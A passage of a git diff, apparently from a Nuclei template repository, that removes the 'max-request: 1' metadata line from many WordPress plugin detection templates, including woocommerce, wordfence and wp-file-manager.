   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
